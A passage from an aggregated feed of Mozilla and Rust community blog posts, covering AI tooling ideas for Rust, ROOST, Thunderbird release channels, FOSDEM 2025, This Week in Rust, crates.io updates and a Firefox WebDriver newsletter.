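            Box::new(Expr::Neg(Box::new(Expr::Num(2)))),
        )),
        Box::new(Expr::Num(40)),
    );
    assert_eq!(eval(&e), 39);
}
```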

Figuring out the right type structure

When I start writing a Rust program, I start by authoring type declarations. As I do this, I tend to think ahead to how I expect the data to be accessed. Am I going to need to iterate over one data structure while writing to another? Will I want to move this data to another thread? The setup of my structures will depend on the answer to these questions.

I think a lot of the frustration beginners feel comes from not having a “feel” yet for the right way to structure their programs. The structure they would use in Java or some other language often won’t work in Rust.

I think an LLM-based assistant could help here by asking them some questions about the kinds of data they need and how it will be accessed. Based on this it could generate type definitions, or alter the definitions that exist.

Complex refactorings like splitting structs

A follow-on to the previous point is that, in Rust, when your data access patterns change as a result of refactorings, it often means you need to do more wholesale updates to your code.6 A common example for me is that I want to split out some of the fields of a struct into a substruct, so that they can be borrowed separately.7 This can be quite non-local and sometimes involves some heuristic choices, like “should I move this method to be defined on the new substruct or keep it where it is?”.
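A before/after sketch of that refactoring (the types and fields are hypothetical): once the mutable state lives in its own substruct, a helper can borrow it mutably while a sibling field stays borrowed immutably.

```rust
struct Counters {
    requests: u64,
}

struct Server {
    name: String,       // read-mostly
    counters: Counters, // mutated on every request
}

// After the split, a helper can borrow just the counters...
fn bump(c: &mut Counters) {
    c.requests += 1;
}

impl Server {
    fn handle(&mut self) {
        // ...while a sibling field stays immutably borrowed. The two
        // field-level borrows are disjoint, so this compiles.
        let name = &self.name;
        bump(&mut self.counters);
        println!("{name}: {} requests", self.counters.requests);
    }
}

fn main() {
    let mut s = Server {
        name: String::from("s1"),
        counters: Counters { requests: 0 },
    };
    s.handle();
    s.handle();
    assert_eq!(s.counters.requests, 2);
}
```

Deciding which methods migrate onto `Counters` (like `bump` here) versus staying on `Server` is exactly the kind of heuristic choice the post describes.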

Migrating consumers over a breaking change

When you run the cargo fix command today it will automatically apply various code suggestions to clean up your code. With the upcoming Rust 2024 edition, cargo fix --edition will do the same but for edition-related changes. All of the logic for these changes is hardcoded in the compiler and it can get a bit tricky.

For editions, we intentionally limit ourselves to local changes, so the coding for these migrations is usually not too bad, but there are some edge cases where it’d be really useful to have heuristics. For example, one of the changes we are making in Rust 2024 affects “temporary lifetimes”. It can affect when destructors run. This almost never matters (your vector will get freed a bit earlier or whatever) but it can matter quite a bit, if the destructor happens to be a lock guard or something with side effects. In practice when I as a human work with changes like this, I can usually tell at a glance whether something is likely to be a problem—but the heuristics I use to make that judgment are a combination of knowing the name of the types involved, knowing something about the way the program works, and perhaps skimming the destructor code itself. We could hand-code these heuristics, but an LLM could do it better, and it could ask questions if it was feeling unsure.
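To make the destructor-timing point concrete, here is a small dependency-free sketch (my example) of why temporary lifetimes are usually invisible but matter a lot for lock guards:

```rust
use std::sync::Mutex;

fn main() {
    let data = Mutex::new(vec![1, 2, 3]);

    // The temporary MutexGuard created by `lock()` is dropped at the end
    // of this whole statement, so the lock is released before the next line:
    let len = data.lock().unwrap().len();
    assert_eq!(len, 3);

    // If a rule change made that guard live longer, this second `lock()`
    // would deadlock. A shift that is invisible when the temporary is a
    // plain vector becomes very visible when the temporary's destructor
    // has side effects, like releasing a lock.
    let len2 = data.lock().unwrap().len();
    assert_eq!(len2, 3);
}
```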

Now imagine you are releasing the 2.x version of your library. Maybe your API has changed in significant ways. Maybe one API call has been broken into two, and the right one to use depends a bit on what you are trying to do. Well, an LLM can help here, just like it can help in translating idioms from Java to Rust.

I imagine the idea of having an LLM help you migrate makes some folks uncomfortable. I get that. There’s no reason it has to be mandatory—I expect we could always have a more limited, precise migration available.8

Optimize your Rust code to eliminate hot spots

Premature optimization is the root of all evil, or so Donald Knuth is said to have said. I’m not sure about all evil, but I have definitely seen people rathole on microoptimizing a piece of code before they know if it’s even expensive (or, for that matter, correct). This is doubly true in Rust, where cloning a small data structure (or reference counting it) can often make your life a lot simpler. Llogiq’s great talks on Easy Mode Rust make exactly this point. But here’s a question: suppose you’ve been taking this advice to heart, inserting clones and the like, and you find that your program is running kind of slow. How do you make it faster? Or, even worse, suppose that you are trying to tune your network service. You are looking at the blizzard of available metrics and trying to figure out what changes to make. What do you do? To get some idea of what is possible, check out Scalene, a Python profiler that is also able to offer suggestions (from Emery Berger’s group at UMass, the professor I talked about earlier).

Diagnose and explain miri and sanitizer errors

Let’s look a bit to the future. I want us to get to a place where the “minimum bar” for writing unsafe code is that you test that unsafe code with some kind of sanitizer that checks for both C and Rust UB—something like miri today, except one that works “at scale” for code that invokes FFI or does other arbitrary things. I expect a smaller set of people will go further, leveraging automated reasoning tools like Kani or Verus to prove statically that their unsafe code is correct9.

From my experience using miri today, I can tell you two things. (1) Every bit of unsafe code I write has some trivial bug or other. (2) If you enjoy puzzling out the occasionally inscrutable error messages you get from Rust, you’re gonna love miri! To be fair, miri has a much harder job—the (still experimental) rules that govern Rust aliasing are intended to be flexible enough to allow all the things people want to do that the borrow checker doesn’t permit. This means they are much more complex. It also means that explaining why you violated them (or may violate them) is that much more complicated.

Just as an AI can help novices understand the borrow checker, it can help advanced Rustaceans understand tree borrows (or whatever aliasing model we wind up adopting). And just as it can make smarter suggestions for whether to modify the function body or its signature, it can likely help you puzzle out a good fix.

Rust’s emphasis on “reliability” makes it a great target for AI

Anyone who has used an LLM-based tool has encountered hallucinations, where the AI just makes up APIs that “seem like they ought to exist”.10 And yet anyone who has used Rust knows that “if it compiles, it works” is true way more often than it has a right to be.11 This suggests to me that any attempt to use the Rust compiler to validate AI-generated code or solutions is going to also help ensure that the code is correct.

AI-based code assistants right now don’t really have this property. I’ve noticed that I kind of have to pick between “shallow but correct” or “deep but hallucinating”. A good example is match statements. I can use rust-analyzer to fill in the match arms and it will do a perfect job, but the body of each arm is todo!. Or I can let the LLM fill them in and it tends to cover most-but-not-all of the arms but it generates bodies. I would love to see us doing deeper integration, so that the tool is talking to the compiler to get perfect answers to questions like “what variants does this enum have” while leveraging the LLM for open-ended questions like “what is the body of this arm”.12

Conclusion

Overall AI reminds me a lot of the web around the year 2000. It’s clearly overhyped. It’s clearly being used for all kinds of things where it is not needed. And it’s clearly going to change everything.

If you want to see examples of what is possible, take a look at the ChatDBG videos published by Emery Berger’s group. You can see how the AI sends commands to the debugger to explore the program state before explaining the root cause. I love the video debugging bootstrap.py, as it shows the AI applying domain knowledge about statistics to debug and explain the problem.

My expectation is that compilers of the future will not contain nearly so much code geared around authoring diagnostics. They’ll present the basic error, sure, but for more detailed explanations they’ll turn to AI. It won’t be just a plain old foundation model; they’ll use RAG techniques and APIs to let the AI query the compiler state, digest what it finds, and explain it to users. Like a good human tutor, the AI will tailor its explanations to the user, leveraging the user’s past experience and intuitions (oh, and in the user’s chosen language).

I am aware that AI has some serious downsides. The most serious to me is its prodigious energy use, but there are also good questions to be asked about the way that training works and the possibility of not respecting licenses. The issues are real, but avoiding AI is not the way to solve them. Just in the course of writing this post, DeepSeek was announced, demonstrating that there is a lot of potential to lower the costs of training. As for the ethics and legality, that is a very complex space. Agents are already doing a lot to get better there, but note also that most of the applications I am excited about do not involve writing code so much as helping people understand and alter the code they’ve written.


  1. We don’t always get this right. For example, I find the zip combinator of iterators annoying because it takes the shortest of the two iterators, which is occasionally nice but far more often hides bugs. ↩︎

  2. The irony, of course, is that AI can help you to improve your woeful lack of tests by auto-generating them based on code coverage and current behavior. ↩︎

  3. I think they told me they heard it somewhere on the internet? Not sure the original source. ↩︎

  4. Personally, the thing I find most annoying about LLMs is the way they are trained to respond like groveling servants. “Oh, that’s a good idea! Let me help you with that” or “I’m sorry, you’re right, I did make a mistake; here is a version that is better”. Come on, I don’t need flattery. The idea is fine but I’m aware it’s not earth-shattering. Just help me already. ↩︎

  5. Inserting a call to clone is actually a bit more subtle than you might think, given the interaction of the async future here. ↩︎

  6. Garbage Collection allows you to make all kinds of refactorings in ownership structure without changing your interface at all. This is convenient, but—as we discussed early on—it can hide bugs. Overall I prefer having that information be explicit in the interface, but that comes with the downside that changes have to be refactored. ↩︎

  7. I also think we should add a feature like View Types to make this less necessary. In this case instead of refactoring the type structure, AI could help by generating the correct type annotations, which might be non-obvious. ↩︎

  8. My hot take here is that if the idea of an LLM doing migrations in your code makes you uncomfortable, you are likely (a) overestimating the quality of your code and (b) underinvesting in tests and QA infrastructure2. I tend to view an LLM as an “inconsistently talented contributor”, and I am perfectly happy having contributors hack away on projects I own. ↩︎

  9. The student asks, “When unsafe code is proven free of UB, does that make it safe?” The master says, “Yes.” The student asks, “And is it then still unsafe?” The master says, “Yes.” Then, a minute later, “Well, sort of.” (We may need new vocabulary.) ↩︎

  10. My personal favorite story of this is when I asked ChatGPT to generate me a list of “real words and their true definition along with 2 or 3 humorous fake definitions” for use in a birthday party game. I told it that “I know you like to hallucinate so please include links where I can verify the real definition”. It generated a great list of words along with plausible looking URLs for merriamwebster.com and so forth—but when I clicked the URLs, they turned out to all be 404s (the words, it turned out, were real—just not the URLs). ↩︎

  11. This is not a unique property of Rust, it is shared by other languages with rich type systems, like Haskell or ML. Rust happens to be the most widespread such language. ↩︎

  12. I’d also like it if the LLM could be a bit less interrupt-y sometimes. Especially when I’m writing type-system code or similar things, it can be distracting when it keeps trying to author stuff it clearly doesn’t understand. I expect this too will improve over time—and I’ve noticed that while, in the beginning, it tends to guess very wrong, over time it tends to guess better. I’m not sure what inputs and context are being fed to the LLM in the background, but it’s evident that it can come to see patterns even for relatively subtle things. ↩︎

The Mozilla BlogROOST: Open source AI safety for everyone

Today we want to point to one of the most exciting announcements at the Paris AI summit: the launch of ROOST, a new nonprofit to build AI safety tools for everyone. 

ROOST stands for Robust Open Online Safety Tools, and it’s solving a clear and important problem: many startups, nonprofits, and governments are trying to use AI responsibly every day, but they lack access to even the most basic safety tools and resources that are available to large tech companies. This not only puts users at risk but slows down innovation. ROOST has backing from top tech companies and philanthropies alike, ensuring that a broad set of stakeholders have a vested interest in its success. This is critical to building the accessible, scalable, and resilient safety infrastructure all of us need for the AI era.

What does this mean practically? ROOST is building, open sourcing and maintaining modular building blocks for AI safety, and offering hands-on support by technical experts to enable organizations of all sizes to build and use AI responsibly. With that, organizations can tackle some of the biggest safety challenges such as eliminating child sexual abuse material (CSAM) from AI datasets and models. 

At Mozilla, we’re proud to have helped kickstart this work, providing a small seed grant for the research at Columbia University that eventually turned into ROOST. Why did we invest early? Because we believe the world needs nonprofit public AI organizations that at once complement and serve as a counterpoint to what’s being built inside the big commercial AI labs. ROOST is exactly this kind of organization, with the potential to create the kind of public technology infrastructure the Mozilla, Linux, and Apache foundations developed in the previous era of the internet.

Our support of ROOST is part of a bigger investment in open source AI and safety. 

In October 2023, before the AI Safety Summit in Bletchley Park, Mozilla worked with Professor Camille Francois and Columbia University to publish an open letter that stated “when it comes to AI Safety and Security, openness is an antidote not a poison.”

Over 1,800 leading experts and community members signed our letter, which compelled us to start the Columbia Convening series to advance the conversation around AI, openness, and safety. The second Columbia Convening (which was an official event on the road to the French AI Action Summit happening this week) brought together over 45 experts and builders in AI to advance practical approaches to AI safety. This work helped shape some of the priorities of ROOST and create a community ready to engage with it going forward. We are thrilled to see ROOST emerge from the 100+ leading AI open source organizations we’ve been bringing together over the past year. It exemplifies the principles of openness, pluralism, and practicality that unite this growing community.

Much has changed in the last year. At the Bletchley Park summit, a number of governments and large AI labs had focused the debate on the so-called existential risks of AI — and were proposing limits on open source AI. Just 15 months later, the tide has shifted. With the world gathering at the AI Action Summit in France, countries are embracing openness as a key component of making AI safe in practical development and deployment contexts. This is an important turning point. 

ROOST launches at exactly the right time and in the right place, using this global AI summit to gather a community that will create the practical building blocks we need to enable a safer AI ecosystem. This is the type of work that makes AI safety a field that everyone can shape and improve.

The post ROOST: Open source AI safety for everyone appeared first on The Mozilla Blog.

Mozilla ThunderbirdThunderbird Desktop Release Channel Will Become Default in March 2025

We have an exciting announcement! Starting with the 136.0 release in March 2025, the Thunderbird Desktop Release channel will be the default download.

If you’re not already familiar with the Release channel, it will be a supported alternative to the ESR channel, providing monthly major releases instead of annual ones. This brings several benefits to our users:

  • Frequent Feature Updates: New features will potentially be available each month, versus the annual Extended Support Release (ESR).
  • Smoother Transitions: Moving from one monthly release to the next will be less disruptive than updating between ESR versions.
  • Consistent Bug Fixes: Users will receive all available bug fixes, rather than relying on patch uplifts, as is the case with ESR.

We’ve been publishing monthly releases since 124.0. We added the Thunderbird Desktop Release Channel to the download page on Oct 1st, 2024.

The next step is to make the release channel an officially supported channel and the default download. We don’t expect this step alone to increase the population significantly. We’re exploring additional methods to encourage adoption in the future, such as in-app notifications to invite ESR users to switch.

One of our goals for 2025 is to increase daily active installations on the release channel to at least 20% of the total installations. At last check, we had 29,543 daily active installations on the release channel, compared to 20,918 on beta, and 5,941 on daily. The release channel installations currently account for 0.27% of the 10,784,551 total active installations tracked on stats.thunderbird.net.

To support this transition and ensure stability for monthly releases, we’re implementing several process improvements, including:

  • Pre-merge freezes: A 4-day soft code freeze of comm-central before merging into comm-beta. We continue to bake the week-long post-merge freeze of the release channel into the schedule.
  • Pre-merge reviews: We evaluate changes prior to both merges (central to beta and beta to release) where risky changes can be reverted.
  • New uplift template: A new and more thorough uplift template.

For more details on these release process changes, please see the Release section of the developer docs.

For more details on scheduling, please see the Thunderbird Releases & Events calendar.

Thank you for your support with this exciting step for Thunderbird. Let’s work together to make the Release channel a success in 2025!

Regards,
Corey

Corey Bryant
Manager, Release Operations | Mozilla Thunderbird

Note: This blog post was taken from Corey’s original announcement at our Thunderbird Planning mailing list

The post Thunderbird Desktop Release Channel Will Become Default in March 2025 appeared first on The Thunderbird Blog.

The Mozilla BlogWelcoming Peter Rojas as Mozilla’s SVP of New Products

Headshot of Peter Rojas, Senior Vice President of New Products at Mozilla, wearing a gray sweater and smiling against a white background.

We’re thrilled to share that Peter Rojas has joined Mozilla Corporation as our new Senior Vice President of New Products. In this role, Peter will lead Mozilla’s endeavors to explore, build and scale new products that align with Mozilla’s greater mission and values. He will report to me and join Mozilla’s steering committee. 

At Mozilla, we are continuing to explore and scale new products that diversify revenue, address evolving consumer needs, and positively impact this new era of the internet. Peter brings a deep well of experience at the intersection of technology, entrepreneurship and product innovation –– expertise that will help Mozilla monetize and expand beyond our flagship browser. His leadership will be instrumental in bringing exciting new products to consumers who value privacy, choice and an open web.

Early in Peter’s career, he co-founded several influential startups, including the consumer technology news and review organization Engadget and the blogging network Weblogs Inc. He was also a founding partner at Betaworks Ventures, where he invested in groundbreaking companies like Rec Room, Hugging Face, Facemoji, and 8th Wall, among others. Several of these companies were later acquired by Niantic, Twitter and Google.

Most recently, Peter led incubations and early-stage explorations as head of product for Meta’s New Product Experimentation (NPE) group. He was also a senior product director for Messenger and Instagram Direct, where he helped tackle some of Meta’s biggest product challenges, including the monetization of Messenger. Peter also served as VP of strategy at AOL, overseeing strategy for AOL’s brand group, and was later promoted to co-director of AOL Alpha, the company’s experimental new product group.

In the past few months, Mozilla has brought on some strong, innovative product leadership, welcoming talent such as Anthony Enzor-DeMeo, Firefox SVP, and Ajit Varma, VP of Firefox Product. I look forward to working closely with Peter and our other new product leaders as Mozilla continues to evolve, offering a range of new products and services that advance our mission.

The post Welcoming Peter Rojas as Mozilla’s SVP of New Products appeared first on The Mozilla Blog.

About:CommunityFOSDEM 2025: A Celebration of Open Source Innovation

Amazing weather at FOSDEM 2025

Brussels came alive this weekend as Mozilla joined FOSDEM 2025, Europe’s premier open-source conference. FOSDEM isn’t just another tech gathering: it is a celebration of a vibrant community, open source innovation, and the spirit of collaboration. And we’re proud to have been part of this amazing event since its inception.

This year, FOSDEM is celebrating its 25th anniversary. And unlike previous years’ gloomy weather, this year, we were blessed with surprising sunshine, almost as if the universe was applauding a quarter-century of open-source achievements.

As for Mozilla, our presence this year was extra special as we introduced our new brand. Over the weekend, we ran a bingo challenge at Mozilla’s and Thunderbird’s stands, where participants could play to win exclusive Mozilla t-shirts and many more pieces of special swag. It was a really fun way to introduce the many projects from across Mozilla.

We also showcased a sneak peek of Firefox Nightly’s new tab group feature in the Mozilla booth and gave away 2300 free cookies to participants on Saturday.

Here are some more highlights from our presence this year:

Highlights from Saturday

  • Mozilla engineering manager Marco Casteluccio presented a talk in the main track about using LLMs to support Firefox developers with code review.
  • Firefox engineer Valentin Gosu also presented a talk in the DNS track about his journey on using the getaddrinfo API in Firefox.
  • Nazim Can Altinova, another Firefox engineer, who works on the Firefox Profiler, also presented a talk in the Web Performance track. It’s also worth mentioning that the Web Performance devroom was co-run by some Mozillians.
  • Danny Colin, one of Mozilla’s active contributors, hosted a WebExtension BoF session featuring representatives from Mozilla Firefox (Rob Wu & Simeon Vincent) and Google Chrome’s extensions team (Oliver Dunk). This was the first time the team ran a Birds Of a Feather session, and it’s very likely that we’re going to do the same next year.
  • Danny Colin also hosted the Community Gathering where old and new contributors got together to discuss the future of Mozilla’s community. It was really nice to have an interactive session like this where all of us can share our perspective, so thank you to all of you who attended the session!

Highlights from Sunday

Mitchell Baker is presenting at FOSDEM 2025

  • Mitchell Baker kicked off Sunday with a keynote session that offered a thought-provoking exploration of Free/Libre Open Source Software (FLOSS) in the age of artificial intelligence and demonstrated how Mozilla plays a role in defining a principled approach to AI that prioritizes transparency, ethics, and community-driven innovation. It was a perfect opening for the talks that we presented at the Mozilla devroom later that day.
  • Around the same time as Mitchell’s session, Mozilla engineer Max Inden also delivered a presentation in the Network devroom, showcasing various techniques the Firefox team uses to enhance Firefox performance.
  • Then, in the second half of Sunday, we also hosted the Mozilla devroom, where we covered a wide range of Mozilla’s latest innovations, from mythbusting to Mozilla’s AI work and Firefox developments. Recordings will be available soon on FOSDEM’s website and via our YouTube channel. So stay tuned!

We’re grateful for the enthusiasm, conversations, and curiosity of attendees at FOSDEM 2025. And big thanks to our amazing volunteers and Mozillians for co-hosting our booth and the Mozilla devroom this year.

We sure had a blast, and we can’t wait to see you again next year!

This Week In RustThis Week in Rust 585

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on X (formerly Twitter) or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Official
Newsletters
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is ratzilla, a library for building terminal-themed web applications with Rust and WebAssembly.

Thanks to Orhun Parmaksız for the self-suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

RFCs
  • No calls for testing were issued this week.
Rust
  • No calls for testing were issued this week.
Rustup
  • No calls for testing were issued this week.

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

No Calls for papers or presentations were submitted this week.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

Updates from the Rust Project

425 pull requests were merged in the last week

Rust Compiler Performance Triage

A very quiet week, with performance of primary benchmarks showing no change overall.

Triage done by @rylev. Revision range: f7538506..01e4f19c

Summary:

(instructions:u)            mean    range             count
Regressions ❌ (primary)     0.3%   [0.2%, 0.6%]      32
Regressions ❌ (secondary)   0.5%   [0.1%, 1.1%]      65
Improvements ✅ (primary)   -0.5%   [-1.0%, -0.2%]    17
Improvements ✅ (secondary) -3.1%   [-10.3%, -0.2%]   20
All ❌✅ (primary)            0.0%   [-1.0%, 0.6%]     49

5 Regressions, 2 Improvements, 5 Mixed; 6 of them in rollups. 49 artifact comparisons made in total.

Full report here.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

  • No RFCs were approved this week.
Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
  • No RFCs entered Final Comment Period this week.
Tracking Issues & PRs
Rust Cargo
  • No Cargo Tracking Issues or PRs entered Final Comment Period this week.
Language Team
  • No Language Team Proposals entered Final Comment Period this week.
Language Reference
  • No Language Reference RFCs entered Final Comment Period this week.
Unsafe Code Guidelines
  • No Unsafe Code Guideline Tracking Issues or PRs entered Final Comment Period this week.
New and Updated RFCs

Upcoming Events

Rusty Events between 2025-02-05 - 2025-03-05 🦀

Virtual
Africa
Asia
Europe
North America
South America:

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

If your rust code compiles and you don't use "unsafe", that is a pretty good certification.

Richard Gould about Rust certifications on rust-users

Thanks to ZiCog for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, U007D, joelmarcey, mariannegoldin, bennyvasquez, bdillo

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

The Rust Programming Language Blogcrates.io: development update

Back in July 2024, we published a blog post about the ongoing development of crates.io. Since then, we have made a lot of progress and shipped a few new features. In this blog post, we want to give you an update on the latest changes that we have made to crates.io.

Crate deletions

In RFC #3660 we proposed a new feature that allows crate owners to delete their crates from crates.io under certain conditions. This can be useful if you have published a crate by mistake or if you want to remove a crate that is no longer maintained. After the RFC was accepted by all team members at the end of August, we began implementing the feature.

We created a new API endpoint DELETE /api/v1/crates/:name that allows crate owners to delete their crates and then created the corresponding user interface. If you are the owner of a crate, you can now go to the crate page, open the "Settings" tab, and find the "Delete this crate" button at the bottom. Clicking this button will lead you to a confirmation page telling you about the potential impact of the deletion and requirements that need to be met in order to delete the crate:

Delete Page Screenshot

As you can see from the screenshot above, a crate can only be deleted if either:

  • the crate has been published for less than 72 hours, or
  • the crate only has a single owner, the crate has been downloaded less than 500 times for each month it has been published, and the crate is not depended upon by any other crate on crates.io.

These requirements were put in place to prevent abuse of the deletion feature and to ensure that crates that are widely used by the community are not deleted accidentally. If you have any feedback on this feature, please let us know!
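Expressed as code, the rules read roughly like the predicate below. This is a sketch based on the conditions described in this post; the struct and field names are invented for illustration and are not crates.io's actual implementation.

```rust
// Invented data model for illustration; not crates.io's real code.
struct CrateInfo {
    hours_since_publish: u64,
    owners: usize,
    total_downloads: u64,
    months_published: u64, // counted from first publish, at least 1
    reverse_dependencies: usize,
}

// A crate may be deleted if it is very new, or if it is low-impact:
// single owner, fewer than 500 downloads per month published, and
// nothing else on crates.io depends on it.
fn can_delete(c: &CrateInfo) -> bool {
    c.hours_since_publish < 72
        || (c.owners == 1
            && c.total_downloads < 500 * c.months_published
            && c.reverse_dependencies == 0)
}

fn main() {
    let fresh = CrateInfo {
        hours_since_publish: 10,
        owners: 1,
        total_downloads: 3,
        months_published: 1,
        reverse_dependencies: 0,
    };
    println!("{}", can_delete(&fresh)); // true
}
```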

OpenAPI description

Around the holiday season we started experimenting with generating an OpenAPI description for the crates.io API. This was a long-standing request from the community, and we are happy to announce that we now have an experimental OpenAPI description available at https://crates.io/api/openapi.json!

Please note that this is still considered work-in-progress: e.g. the stability guarantees for the endpoints are not written down, and the response schemas are not fully documented yet.

You can view the OpenAPI description in e.g. a Swagger UI at https://petstore.swagger.io/ by putting https://crates.io/api/openapi.json in the top input field. We decided to not ship a viewer ourselves for now due to security concerns with running it on the same domain as crates.io itself. We may reconsider whether to offer it on a dedicated subdomain in the future if there is enough interest.

Swagger UI Screenshot

The OpenAPI description is generated by the utoipa crate, which is a tool that can be integrated with the axum web framework to automatically generate OpenAPI descriptions for all of your endpoints. We would like to thank Juha Kukkonen for his great work on this tool!

Support form and "Report Crate" button

Since the crates.io team is small and mostly consists of volunteers, we do not have the capacity to manually monitor all publishes. Instead, we rely on you, the Rust community, to help us catch malicious crates and users. To make it easier for you to report suspicious crates, we added a "Report Crate" button to all the crate pages. If you come across a crate that you think is malicious or violates the code of conduct or our usage policy, you can now click the "Report Crate" button and fill out the form that appears. This will send an email to the crates.io team, who will then review the crate and take appropriate action if necessary. Thank you to crates.io team member @eth3lbert who worked on the majority of this.

If you have any issues with the support form or the "Report Crate" button, please let us know. You can also always email us directly at help@crates.io if you prefer not to use the form.

Publish notifications

We have added a new feature that allows you to receive email notifications when a new version of your crate is published. This can be useful in detecting unauthorized publishes of your crate or simply to keep track of publishes from other members of your team.

Publish Notification Screenshot

This feature was another long-standing feature request from our community, and we were happy to finally implement it. If you'd prefer not to receive publish notifications, then you can go to your account settings on crates.io and disable these notifications.

Miscellaneous

These were some of the more visible changes to crates.io over the past couple of months, but a lot has happened "under the hood" as well.

  • RFC #3691 was opened and accepted to implement "Trusted Publishing" support on crates.io, similar to other ecosystems that adopted it. This will allow you to specify on crates.io which repository/system is allowed to publish new releases of your crate, allowing you to publish crates from CI systems without having to deal with API tokens anymore.

  • Slightly related to the above: API tokens created on crates.io now expire after 90 days by default. It is still possible to disable the expiry or choose other expiry durations though.

  • The crates.io team was one of the first projects to use the diesel database access library, but since that only supported synchronous execution it was sometimes a little awkward to use in our codebase, which was increasingly moving into an async direction after our migration to axum a while ago. The maintainer of diesel, Georg Semmler, did a lot of work to make it possible to use diesel in an async way, resulting in the diesel-async library. Over the past couple of months we incrementally ported crates.io over to diesel-async queries, which now allows us to take advantage of the internal query pipelining in diesel-async that resulted in some of our API endpoints getting a 10-15% performance boost. Thank you, Georg, for your work on these crates!

  • Whenever you publish a new version or yank/unyank existing versions a couple of things need to be updated. Our internal database is immediately updated, and then we synchronize the sparse and git index in background worker jobs. Previously, yanking and unyanking a high number of versions would each queue up another synchronization background job. We have now implemented automatic deduplication of redundant background jobs, making our background worker a bit more efficient.

  • The final big, internal change that was just merged last week is related to the testing of our frontend code. In the past we used a tool called Mirage to implement a mock version of our API, which allowed us to run our frontend test suite without having to spin up a full backend server. Unfortunately, the maintenance situation around Mirage had lately forced us to look into alternatives, and we are happy to report that we have now fully migrated to the "Industry standard API mocking" package msw. If you want to know more, you can find the details in the "small" migration pull request.
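The background-job deduplication mentioned above can be sketched roughly like this. The job type and queue shape are invented for illustration; this is not crates.io's actual background-worker code.

```rust
use std::collections::HashSet;

// Invented job type for illustration.
#[derive(Clone, Hash, PartialEq, Eq)]
struct Job {
    kind: &'static str, // e.g. "sync_sparse_index"
    krate: String,      // the crate the job operates on
}

// Enqueue a job only if an identical job is not already pending, so
// that yanking many versions of one crate queues a single sync job.
fn enqueue(queue: &mut Vec<Job>, pending: &mut HashSet<Job>, job: Job) {
    if pending.insert(job.clone()) {
        queue.push(job);
    }
}

fn main() {
    let mut queue = Vec::new();
    let mut pending = HashSet::new();
    // Yanking three versions of the same crate...
    for _ in 0..3 {
        let job = Job { kind: "sync_sparse_index", krate: "example".into() };
        enqueue(&mut queue, &mut pending, job);
    }
    println!("{}", queue.len()); // 1 — the redundant jobs were deduplicated
}
```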

Feedback

We hope you enjoyed this update on the development of crates.io. If you have any feedback or questions, please let us know on Zulip or GitHub. We are always happy to hear from you and are looking forward to your feedback!

Firefox Developer ExperienceFirefox WebDriver Newsletter 135

WebDriver is a remote control interface that enables introspection and control of user agents. As such it can help developers to verify that their websites are working and performing well with all major browsers. The protocol is standardized by the W3C and consists of two separate specifications: WebDriver classic (HTTP) and the new WebDriver BiDi (Bi-Directional).

This newsletter gives an overview of the work we’ve done as part of the Firefox 135 release cycle.

Contributions

Firefox is an open source project, and we are always happy to receive external code contributions to our WebDriver implementation. We want to give special thanks to everyone who filed issues, bugs and submitted patches.

In Firefox 135, several contributors managed to land fixes and improvements in our codebase:

WebDriver code is written in JavaScript, Python, and Rust so any web developer can contribute! Read how to setup the work environment and check the list of mentored issues for Marionette, or the list of mentored JavaScript bugs for WebDriver BiDi. Join our chatroom if you need any help to get started!

General

Improved user interactions simulation

To make user events more realistic and better simulate real user interactions in the browser, we have moved the action sequence processing of the Perform Actions commands in both Marionette and WebDriver BiDi from the content process to the parent process. While events are still sent synchronously from the content process, they are now triggered asynchronously via IPC calls originating from the parent process.

Due to this significant change, you might experience some regressions. If you encounter any issues, please file a bug for the Remote Agent. If the regressions block test execution, you can temporarily revert to the previous behavior by setting the Firefox preference remote.events.async.enabled to false.
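For anyone who needs the workaround to persist across restarts, the preference can also be set via a user.js fragment in the Firefox profile directory. The preference name comes from the newsletter above; the user.js mechanism itself is standard Firefox profile configuration:

```js
// user.js in the Firefox profile directory: temporarily revert to the
// previous synchronous action dispatching while regressions are triaged.
user_pref("remote.events.async.enabled", false);
```

Remember to remove the line again once the blocking issue is fixed, so you return to the default asynchronous behavior.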

With the processing of actions now handled in the parent process, the following issues were fixed as well:

WebDriver BiDi

New: format argument for browsingContext.captureScreenshot

Thanks to Liam’s work, the browsingContext.captureScreenshot command now supports the format argument. It allows clients to specify different file formats ("image/png" and "image/jpeg" are currently supported) and define the compression quality for screenshots.

The argument should follow the browsingContext.ImageFormat type, with a "type" property which is expected to be a string, and an optional "quality" property which can be a float between 0 and 1.

-> {
  "method": "browsingContext.captureScreenshot",
  "params": {
    "context": "6b1cd006-96f0-4f24-9c40-a96a0cf71e22",
    "origin": "document",
    "format": {
      "type": "image/jpeg",
      "quality": 0.1
    }
  },
  "id": 3
}

<- {
  "type": "success",
  "id": 3,
  "result": {
